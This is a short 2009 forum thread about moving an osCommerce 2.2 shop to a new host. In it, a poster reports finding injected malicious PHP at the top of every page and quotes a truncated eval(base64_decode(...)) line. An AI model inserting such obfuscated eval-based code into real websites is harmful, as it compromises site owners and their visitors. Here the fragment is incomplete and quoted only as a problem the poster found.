Muldrick Posted November 1, 2009 Posted November 1, 2009 I'm moving my site to another place. I went into my Admin Database backup and backed it up. Installed a new OSC 2.2 to my new location. Now what? Help please? Use wsftp and drag my site over????
airbrushmaster Posted November 1, 2009 Posted November 1, 2009 your new host should do it all for you for free
Muldrick Posted November 1, 2009 Author Posted November 1, 2009 your new host should do it all for you for free You know how they are. They don't work with OSC so they "don't know". But I'll ask anyway.
Muldrick Posted November 2, 2009 Author Posted November 2, 2009 Yeah, they helped. And discovered that every page has this malicious code on the top like this: <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1etc, etc. Has anyone else had this happen? Looks like I'll have to start all over? Should I just install OSC 3.? now, or stay with 2.2?
Guest Posted November 2, 2009 Posted November 2, 2009 i think you should reinstall the software rather than just copy your old files due to security purposes.
fabcards Posted November 2, 2009 Posted November 2, 2009 i think you should reinstall the software rather than just copy your old files due to security purposes. If you reinstall rather than jsut copy what happens all the configuration and customisation that you have already done before....im in the process of moving servers also and jsut thought that ill id need to do is copy the files over
